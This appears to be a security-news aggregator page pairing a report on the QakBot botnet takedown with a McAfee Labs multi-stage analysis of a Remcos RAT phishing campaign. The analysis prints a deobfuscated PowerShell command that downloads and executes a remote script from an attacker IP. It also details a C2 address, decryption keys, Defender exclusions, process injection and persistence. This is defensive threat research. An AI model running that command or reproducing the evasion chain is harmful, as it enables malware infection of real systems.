The U.S. government today announced a coordinated crackdown against QakBot, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet’s online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computers.

In an international operation announced today dubbed “Duck Hunt,” the U.S. Department of Justice (DOJ) and Federal Bureau of Investigation (FBI) said they obtained court orders to remove Qakbot from infected devices, and to seize servers used to control the botnet.

“This is the most significant technological and financial operation ever led by the Department of Justice against a botnet,” said Martin Estrada, the U.S. attorney for the Southern District of California, at a press conference this morning in Los Angeles.

Estrada said Qakbot has been implicated in 40 different ransomware attacks over the past 18 months, intrusions that collectively cost victims more than $58 million in losses.

Emerging in 2007 as a banking trojan, QakBot (a.k.a. Qbot and Pinkslipbot) has morphed into an advanced malware strain now used by multiple cybercriminal groups to prepare newly compromised networks for ransomware infestations. QakBot is most commonly delivered via email phishing lures disguised as something legitimate and time-sensitive, such as invoices or work orders.

Don Alway, assistant director in charge of the FBI’s Los Angeles field office, said federal investigators gained access to an online panel that allowed cybercrooks to monitor and control the actions of the botnet. From there, investigators obtained court-ordered approval to instruct all infected systems to uninstall Qakbot and to disconnect themselves from the botnet, Alway said.

The DOJ says their access to the botnet’s control panel revealed that Qakbot had been used to infect more than 700,000 machines in the past year alone, including 200,000 systems in the United States.

Working with law enforcement partners in France, Germany, Latvia, the Netherlands, Romania and the United Kingdom, the DOJ said it was able to seize more than 50 Internet servers tied to the malware network, and nearly $9 million in ill-gotten cryptocurrency from QakBot’s cybercriminal overlords. The DOJ declined to say whether any suspects were questioned or arrested in connection with Qakbot, citing an ongoing investigation.

According to recent figures from the managed security firm Reliaquest, QakBot is by far the most prevalent malware “loader” — malicious software used to secure access to a hacked network and help drop additional malware payloads. Reliaquest says QakBot infections accounted for nearly one-third of all loaders observed in the wild during the first six months of this year.

Researchers at AT&T Alien Labs say the crooks responsible for maintaining the QakBot botnet have rented their creation to various cybercrime groups over the years. More recently, however, QakBot has been closely associated with ransomware attacks from Black Basta, a prolific Russian-language criminal group that was thought to have spun off from the Conti ransomware gang in early 2022.

Today’s operation is not the first time the U.S. government has used court orders to remotely disinfect systems compromised with malware. In April 2022, the DOJ quietly removed malware from computers around the world infected by the “Snake” malware, an even older malware family that has been tied to the GRU, an intelligence arm of the Russian military.

Documents published by the DOJ in support of today’s takedown state that beginning on Aug. 25, 2023, law enforcement gained access to the Qakbot botnet, redirected botnet traffic to and through servers controlled by law enforcement, and instructed Qakbot-infected computers to download a Qakbot Uninstall file that uninstalled Qakbot malware from the infected computer.

“The Qakbot Uninstall file did not remediate other malware that was already installed on infected computers,” the government explained. “Instead, it was designed to prevent additional Qakbot malware from being installed on the infected computer by untethering the victim computer from the Qakbot botnet.”

The DOJ said it also recovered more than 6.5 million stolen passwords and other credentials, and that it has shared this information with two websites that let users check to see if their credentials were exposed: Have I Been Pwned, and a “Check Your Hack” website erected by the Dutch National Police.

Further reading:

–The DOJ’s application for a search warrant application tied to Qakbot uninstall file (PDF)
–The search warrant application connected to QakBot server infrastructure in the United States (PDF)
–The government’s application for a warrant to seize virtual currency from the QakBot operators (PDF)

Read More

Authored by Preksha Saxena

McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file. 

Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary. 

Execution Flow: 

  

Figure 1: Execution Flow 

Stage 1: Analysis of VBS file 

VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too. 

Investigating this VBS script started with dealing with the large comment blocks as shown in figure below. 

Figure 2:VBS Script 

 One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line. 

Another part of VBS script is the execute function shown in below image, which merely decodes a fake message. 

“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!” 

Figure 3:Deobfuscating PowerShell command using replace function. 

 The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to: 

“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();””” 

Stage 2: Analysis of PowerShell script (87656.txt)  

The downloaded file, 87656.txt, is an obfuscated PowerShell script. 

Figure 4:Obfuscated PowerShell Script 

 The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection. 

Figure 5:Resolving IEX 

Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm. 

Decompressed data is again a PowerShell script which is analyzed below. 

Stage 3: Analysis of decompressed PowerShell script  

The decompressed PowerShell script is large and obfuscated: 

Figure 6: Decompressed PowerShell script 

The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable. 

Figure 7:Deobfuscating PowerShell script 

The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage. 

Figure 8: Base64 encoded data. 

The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process. 

 Figure 9: Code used for PE injection. 

Windows Defender exclusions are added. 

Figure 10: Exclusion code 

Stage 4: Analysis of decoded PE File  

The 1.1MB PE file is a .NET binary, using an MSIL loader. 

Figure 11: MSIL Loader 

The Main function calls the Units function, which calls a random function. 

Figure 12:Main function 

The random function contains a large amount of encrypted data, stored in a text variable. 

Figure 13: Encrypted data 

The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal). 

Figure 14: code for converting data to uppercase. 

The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below. 

To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function. 

Figure 15: RC4 algorithm 

Figure 16: New instance created for decrypted dll 

Stage 5: Analysis of dGXsvRf.dll 

Decrypted DLL ‘dGXsvRf.dll’ is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload. 

Figure 17: Encrypted payload 

SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.  

Figure 18: SykCryptor Encrypted data 

Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”. 

Figure 19: RC4 Algorithm 

Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation. 

Figure 20: Loading DLL for deflation. 

The DLL then decrypts a list of various security solution process names: 

Figure 21:Code for decrypting Security processes Names 

The decrypted list of process names include: 

vsserv bdservicehost odscanui bdagent  

bullgaurd BgScan BullGuardBhvScanner etc. 

The malware also drops acopy of itself in the %appdata% folder using cmd. 

Figure 22: Copying file. 

Persistence: 

To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry. 

Figure 23: Persistence Mechanism 

Process Injection: 

The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on. 

Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread. 

Figure 24: Process Injection 

Stage 6: Analysis of final payload 

The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are: 

Figure 25: Strings in payload 

The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long. 

Figure 26: RC4 encrypted configuration file 

Decrypted Configuration: 

 Figure 27: Decrypted configuration 

The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware. 

Conclusion: 

RemocosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe. 

Indicators of Compromise (IOCs):  

SHA256 
Filetype 

0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67 
VBS 

3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c 
PowerShell 

1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4 
MSIL loader 

32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf 
SykCrypter 

61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517 
Remcos Payload 

The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.

Read More

Kaspersky explained that LockBit 3.0, also known as LockBit Black, first emerged in June 2022

Read More

Sophos X-Ops suspects the involvement of a well-known ransomware threat actor known as STAC4663

Read More